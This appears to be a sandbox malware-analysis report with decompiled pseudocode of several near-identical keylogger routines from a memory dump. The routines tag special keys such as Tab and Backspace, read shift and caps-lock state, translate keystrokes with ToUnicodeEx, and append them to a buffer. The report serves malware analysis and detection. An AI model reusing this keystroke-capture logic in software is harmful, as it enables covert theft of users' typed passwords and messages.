Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F14], xrefs: 00C85AF5
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85C8B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C8B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Left Ctrl]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85c8b
0x00c85c92
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Left Ctrl], xrefs: 00C85C8D
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C859E3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C859E3(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Separator]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c859e3
0x00c859ea
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Separator], xrefs: 00C859E5
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8584B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8584B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Backspace]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c8584b
0x00c85852
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Backspace], xrefs: 00C8584D
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85C36, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C36(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Help]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85c36
0x00c85c3d
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Help], xrefs: 00C85C38
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85A16, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A16(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Tab]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85a16
0x00c85a1d
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

